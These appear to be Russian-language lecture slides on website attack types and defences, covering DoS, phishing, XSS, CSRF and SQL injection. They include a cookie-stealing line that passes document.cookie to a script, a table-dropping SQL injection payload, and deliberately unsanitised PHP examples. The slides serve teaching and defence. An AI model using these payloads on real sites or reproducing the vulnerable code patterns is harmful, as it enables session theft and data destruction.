Уязвимость сайтов и обеспечение их безопасности
Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации Выведение сайтов из строя, удаление данных Замена содержимого сайтов, размещение рекламной информации
Предметы атак на сайты WWW-сервера: Операционная система HTTP-сервер Серверные расширения Веб-приложения WWW-клиенты: Операционная система (внедрение вирусов) Получение cookie, хранящихся на компьютере
Виды сетевых атак DoS-атаки и DDoS-атаки ( Distributed Denial of Service ) Фишинг (phishing) ip-спуфинг (spoofing) Троянский конь (Spyware) drive-by download (загрузка программ на сервер) Cross-Site Scripting (CSS) (HTML injection) SQL injection XSS (межсайтовый скриптинг) CSRF (Cross-site request forgery) Атака одного клика Без использования сетевых средств
HTML injection window.open(" t.cgi?cookie="+document.cookie)
SQL injection $firstname = $_POST["firstname"]; mysql_query("SELECT * FROM users WHERE first_name='$firstname'"); Если firstname = "'; drop table users; #", то код удалит таблицу пользователей
XSS (межсайтовый скриптинг) $firstname = $_GET["firstname"]; echo "Your name: $firstname"; Если firstname = " … ", то скрипт будет выполнен Достаточно дать пользователям ссылку …
CSRF Атака одного клика Заставить клиента выполнить нужный запрос
Защита от интернет-атак Защита на стороне сервера: Настройка прав на компьютере-сервере Настройка http-сервера Аккуратное программирование на стороне сервера Проверка входящих http-запросов Защита на клиенте: Общая антивирусная защита Проверка входящего http-трафика Настройки безопасности браузеров Разумные методы хранения паролей и конфиденциальных данных